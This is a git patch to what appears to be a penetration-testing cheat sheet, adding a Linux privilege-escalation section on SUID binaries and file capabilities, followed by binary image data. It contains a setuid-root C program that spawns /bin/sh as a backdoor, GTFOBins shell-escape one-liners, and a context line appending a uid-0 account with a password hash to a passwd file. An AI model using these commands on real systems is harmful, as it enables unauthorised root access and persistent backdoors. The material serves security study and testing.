From 3bcd3d1b3c9e3dfd531b7c56c30fd73aa5498856 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 13 Jan 2019 22:05:39 +0100 Subject: [PATCH] SUID & Capabilities --- .../Linux - Privilege Escalation.md | 54 +++++++++++++++++- XSS injection/Images/DwrkbH1VAAErOI2.jpg | Bin 0 -> 29778 bytes 2 files changed, 52 insertions(+), 2 deletions(-) create mode 100644 XSS injection/Images/DwrkbH1VAAErOI2.jpg diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 7a0fad4..c3209ba 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -83,11 +83,61 @@ * Checks to see if the host has Docker installed * Checks to determine if we're in an LXC container + + +## SUID + +SUID/Setuid stands for "set user ID upon execution", it is enabled by default in every Linux distributions. If a file with this bit is ran, the uid will be changed by the owner one. If the file owner is `root`, the uid will be changed to `root` even if it was executed from user `bob`. SUID bit is represented by an `s`. + +```powershell +╭─swissky@lab ~ +╰─$ ls /usr/bin/sudo -alh +-rwsr-xr-x 1 root root 138K 23 nov. 16:04 /usr/bin/sudo +``` + +### Find SUID binaries + +```bash +find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \; +``` + +### Create a SUID binary + +```bash +print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c +gcc -o /tmp/suid /tmp/suid.c +sudo chmod +x /tmp/suid # execute right +sudo chmod +s /tmp/suid # setuid bit +``` + + +## Capabilies + +List capabilities of binaries +```bash +╭─swissky@crashmanjaro ~ +╰─$ getcap -r /usr/bin +/usr/bin/fping = cap_net_raw+ep +/usr/bin/dumpcap = cap_dac_override,cap_net_admin,cap_net_raw+eip +/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep +/usr/bin/rlogin = cap_net_bind_service+ep +/usr/bin/ping = cap_net_raw+ep +/usr/bin/rsh = cap_net_bind_service+ep +/usr/bin/rcp = cap_net_bind_service+ep +``` + +Edit capabilites +```powershell +/sbin/setcap -r /bin/ping # remove +setcap cap_net_raw+p /bin/ping # add +``` + + ## GTFOBins [GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. -The project collects legitimate functions of Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks. +The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks. > gdb -nx -ex '!sh' -ex quit > sudo mysql -e '\! /bin/sh' @@ -107,4 +157,4 @@ $> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt ## References -- []() \ No newline at end of file +- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) \ No newline at end of file diff --git a/XSS injection/Images/DwrkbH1VAAErOI2.jpg b/XSS injection/Images/DwrkbH1VAAErOI2.jpg new file mode 100644 index 0000000000000000000000000000000000000000..6fdfa814e0204f179b24aa3f6b790b8b30f2a31e GIT binary patch literal 29778 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 